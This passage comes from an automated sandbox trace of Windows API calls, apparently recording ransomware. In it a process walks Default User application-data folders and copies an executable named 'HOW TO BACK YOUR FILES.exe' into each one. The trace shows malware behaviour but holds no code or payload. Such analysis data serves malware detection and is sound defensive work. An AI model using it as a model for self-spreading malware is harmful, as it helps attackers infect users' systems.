settings\\default user\\local settings\\application data\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.660] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.660] GetLastError () returned 0x0 [0078.660] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.660] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.660] CloseHandle (hObject=0xa4) returned 1 [0078.661] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.661] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559cae60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559cae60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.661] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.661] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.661] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail" [0078.661] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail" [0078.661] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.661] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.662] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.662] GetLastError () returned 0x0 [0078.662] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.662] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.662] CloseHandle (hObject=0xa4) returned 1 [0078.662] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.662] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x574201c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x574201c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.662] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.662] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.663] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0078.663] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0078.663] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.663] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\windows mail\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.663] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.663] GetLastError () returned 0x0 [0078.663] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.663] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.664] CloseHandle (hObject=0xa4) returned 1 [0078.664] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.664] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x578246e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x578246e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.664] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.664] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.664] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup" [0078.664] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup" [0078.664] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.664] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\windows mail\\backup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.665] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.666] GetLastError () returned 0x0 [0078.666] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.666] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.666] CloseHandle (hObject=0xa4) returned 1 [0078.666] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.666] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a89a8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a89a8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.666] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.666] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.666] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0078.667] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0078.667] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.667] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\windows mail\\backup\\new\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.667] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.667] GetLastError () returned 0x0 [0078.667] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.667] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.668] CloseHandle (hObject=0xa4) returned 1 [0078.668] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.668] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5840b4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5840b4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.668] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.668] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.668] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player" [0078.668] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player" [0078.668] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.668] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.669] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.669] GetLastError () returned 0x0 [0078.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.669] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.669] CloseHandle (hObject=0xa4) returned 1 [0078.669] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.669] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.669] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.669] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.670] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0078.670] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0078.670] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.670] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.670] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.670] GetLastError () returned 0x0 [0078.670] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.670] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.671] CloseHandle (hObject=0xa4) returned 1 [0078.671] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.671] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.671] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.671] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.671] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0078.671] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0078.671] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.671] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.672] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.672] GetLastError () returned 0x0 [0078.672] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.672] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.672] CloseHandle (hObject=0xa4) returned 1 [0078.672] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.672] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.672] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.672] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.673] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0078.673] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0078.673] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.673] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.673] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.673] GetLastError () returned 0x0 [0078.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.673] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.674] CloseHandle (hObject=0xa4) returned 1 [0078.674] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.674] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58646980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58646980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.674] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.674] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.674] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer" [0078.674] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer" [0078.674] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.674] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 